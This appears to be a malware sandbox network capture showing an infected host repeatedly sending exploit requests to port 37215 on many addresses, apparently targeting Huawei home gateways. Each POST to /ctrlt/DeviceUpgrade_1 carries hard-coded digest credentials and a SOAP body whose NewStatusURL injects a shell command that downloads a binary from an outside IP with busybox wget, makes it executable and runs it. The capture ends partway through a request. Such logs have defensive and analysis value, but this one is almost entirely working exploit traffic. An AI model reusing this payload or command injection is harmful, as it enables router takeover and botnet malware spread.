                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1421192.168.2.1554574197.213.209.7337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.732600927 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1422192.168.2.1549194197.184.188.15337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.732604027 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1423192.168.2.1545292197.174.40.17437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.732637882 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1424192.168.2.1548398197.25.53.17737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.732642889 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1425192.168.2.1550558197.93.197.17237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.732650042 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1426192.168.2.1551832197.134.176.10637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.732691050 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1427192.168.2.1555460197.38.222.12937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.732692957 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1428192.168.2.1555932197.101.76.11537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.732727051 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1429192.168.2.1540150197.164.116.19137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.732728958 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1430192.168.2.1537602197.10.139.18137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.732757092 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
